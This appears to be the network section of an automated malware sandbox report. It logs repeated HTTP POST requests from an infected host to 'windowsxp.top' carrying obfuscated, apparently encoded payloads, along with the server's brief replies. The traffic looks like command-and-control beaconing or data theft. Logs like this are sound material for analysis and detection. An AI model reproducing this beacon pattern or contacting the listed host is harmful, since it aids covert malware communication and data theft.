                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1271&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1210702&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  115 | 192.168.2.4 | 50128 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:27.877024889 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:28.227422953 CET | 1008 | OUT | Data
                                                                                                                  Oct 27, 2024 19:24:28.502160072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:28.815150023 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XS0aocY6NnK05zDwUBSSwvUDKhCHOep%2B%2F6VAfL3MHUZ2zezQgOmcX1OUa1qET1a01CgmT%2BpTxin8fVofoTrceelsUGNq%2BGfR7soTaIvwGpokzX2MFZ8NlCA6V51M5cd8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b921cb946b43-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1275&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1245055&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  116 | 192.168.2.4 | 50129 | 188.114.97.3 | 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:28.953830004 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:29.308504105 CET | 1012 | OUT | Data
                                                                                                                  Oct 27, 2024 19:24:29.568263054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:29.773999929 CET | 771 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmBWKOq7HPoRtaqCZ4%2FOWwsQ0hh%2FcnWPboVAwU%2Fj5xb0ktHQ%2BxWhWrRvUDmHqpKQzBXLi8iBbJTe7p43WJ4VpNgNWmDHl0dXyzX1hwgtyypWpcV%2FXLKQ2xLwtZSik%2BOD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9286a06ddaf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=983&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1426600&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:29.774049044 CET    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  117    192.168.2.4    50130    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:30.058643103 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:30.414948940 CET    1012    OUT    Data Raw: 55 56 5d 5b 5e 5f 56 56 54 58 57 54 54 56 5b 5c 59 5a 5b 51 52 52 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UV][^_VVTXWTTV[\YZ[QRRR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&,Y5*5P'.#'8T/.(S)U7'Y8-7^>,)-/!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:30.670496941 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:30.973568916 CET    772    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9%2BRZSEqSdS4vkjQwPOvi%2BiMGFJySdXrqzlyQypL97wysR0kHEKzKkZD28NbXTQFkUuktBtPgUgQ0T5sJ%2FoPmNrxEVjHxR0MmMw18OrEfkKCR66d8CBmW0YmkP1Ux44B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b92f4f374768-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1330882&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  118    192.168.2.4    50131    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:31.106937885 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:31.462114096 CET    1012    OUT    Data Raw: 50 55 58 59 5e 58 56 50 54 58 57 54 54 5d 5b 52 59 5e 5b 5e 52 56 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXY^XVPTXWTT][RY^[^RVR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%=#"\%Y554Z.7<0+;,)4#'_,_>*.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:31.709080935 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:31.919259071 CET    774    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yDsZbrNCxqVDHfzERt%2B9xOvIsFt9WqHVHSfO0S7uhgg1xj4OKtbmf5gWoW28KcPJF2kJwTko%2BmBru4LG2o8EwDDiAFALTWqFBjnv%2BghXY%2F0G0Fo7vBIPSo77EAVDOjt4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b935c83c474b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1210&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1271290&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  119    192.168.2.4    50132    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:31.224231005 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:31.587496996 CET    1716    OUT    Data Raw: 50 51 58 5e 5b 58 53 50 54 58 57 54 54 56 5b 53 59 59 5b 50 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQX^[XSPTXWTTV[SYY[PRQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'%,"*)^"4,'3'3;X?(, V7"'_/'X):X-!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:31.826196909 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:32.047009945 CET    923    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OD%2FeJFG2QLA4Ddk%2BEE0g3zR%2F1vc1Gjh1CbSGX8MxxWLSGCi2iIhRkOaPooc3lgTYwMXfDpr6FpeCETctDpeVQ0sV8yjIqXWPKMUbjfRCm7UxZS7Xwhiytzm1%2BOXpoHVp"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9368a5da915-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1266841&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5c 37 2e 0d 0d 28 2c 00 09 3e 1f 0f 5f 24 02 0b 5a 38 1c 30 1c 3e 03 1b 1f 39 16 3e 55 24 24 3a 1a 29 39 3b 01 23 58 2b 0d 3e 35 21 5e 00 1c 27 5f 20 3e 21 56 31 15 02 17 27 20 0e 5f 21 13 37 14 2a 2d 39 1c 3c 39 2f 07 3c 28 27 54 38 3f 0b 57 27 29 26 5e 3b 5e 29 07 28 10 2a 54 0c 14 21 5b 2e 2c 3f 07 35 31 13 56 3d 22 38 58 24 07 30 15 24 04 24 56 3f 05 20 07 3f 04 22 02 21 12 34 1f 2b 28 3a 5c 24 3d 37 5b 29 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"\7.(,>_$Z80>9>U$$:)9;#X+>5!^'_ >!V1' _!7*-9<9/<('T8?W')&^;^)(*T![.,?51V="8X$0$$V? ?"!4+(:\$=7[)."T")S0YP0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  120    192.168.2.4    50133    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:32.043570995 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:32.399358988 CET    1012    OUT    Data Raw: 55 5a 5d 58 5e 52 53 53 54 58 57 54 54 53 5b 58 59 59 5b 5d 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]X^RSSTXWTTS[XYY[]R^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&X4X6:X#&,9'(#;U)<74;[;'*>9!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:32.656481028 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:32.864372969 CET    784    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X9Wtl%2Bk2c2tfKx2kXo8%2FqeFXraa6%2FI9ZThE9%2BXKngyHxNweZqLz%2BAT%2BDeIrDOgbBurhEOBFZ6a3Krp7KrRCMUbTLReop%2Br%2FsTd1Z%2F7dbYzdYq3xTK6eIEjxogxEUh9bk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b93bb9dee86f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1299820&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  121    192.168.2.4    50134    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:33.030313969 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:33.383840084 CET    1012    OUT    Data Raw: 55 56 58 5b 5e 53 53 54 54 58 57 54 54 56 5b 59 59 5d 5b 5e 52 57 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX[^SSTTXWTTV[YY][^RWR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%.36)!4-7,0;(T8= )/( 1'Y8=0)&Y,/!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:33.634983063 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:33.834570885 CET    776    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BsvjnfqHVrywqF7YZKeUD26ZIYWGlVEMshZf3UO%2BJxgH7MfqCvLMV%2BGMbHiYtJyIFa8hUU%2F1yka5mILsk4M%2FSdSmRbjLpA832vN%2FnWoCImKmAcIwNrWS87zZug3iTrg0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b941dae20bb8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1285&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1122480&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  122    192.168.2.4    50135    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:33.964167118 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:34.321176052 CET    1012    OUT    Data Raw: 50 56 58 55 5e 5b 56 52 54 58 57 54 54 50 5b 5b 59 58 5b 5f 52 53 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXU^[VRTXWTTP[[YX[_RSR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%>7"5]5P(_:'<0;>,W=/,4T?_,-7=&,?!Y##X(7
                                                                                                                  Oct 27, 2024 19:24:34.591531038 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:34.814537048 CET    786    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MzlYLoB1PTDySla6WwjG4ER7Y%2B6%2FP9xDK5rdi28rsDpEBCo%2FKMlIuJ%2BHAcKSbm%2FhbVo%2F7LGqx224FUiMfC%2FFjFj33qBPXge8SDz8fgdPdQbIxmBFPmG%2FJ2qmDqX0%2Fkk%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b947c9904864-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1119876&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                  123    192.168.2.4    50136    188.114.97.3    80
                                                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                                                  Oct 27, 2024 19:24:34.956835032 CET    321    OUT    POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:35.305845022 CET1012OUTData Raw: 50 50 58 5a 5b 5b 56 57 54 58 57 54 54 53 5b 58 59 5b 5b 59 52 5e 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXZ[[VWTXWTTS[XY[[YR^R]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2>75:56$\.#$^ T/'*#T38=4>?"Y-!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:35.560169935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:35.838161945 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZCOLWcHc7KgKLRVEYlAsOVa1VcvkVcRRqudbI5tA2%2FP7RD07rvEnIE3Ra8yeJZwEfjerHyKHIyJp%2FeN%2B%2BQxlc9nRSXz2MyyLeyeJ5x9TZ%2BJQfL5s99lWNu2jS85%2Fm9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b94ddd3de546-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1211715&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0
                                                                                                                  Oct 27, 2024 19:24:35.838184118 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZCOLWcHc7KgKLRVEYlAsOVa1VcvkVcRRqudbI5tA2%2FP7RD07rvEnIE3Ra8yeJZwEfjerHyKHIyJp%2FeN%2B%2BQxlc9nRSXz2MyyLeyeJ5x9TZ%2BJQfL5s99lWNu2jS85%2Fm9z"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b94ddd3de546-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1211715&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
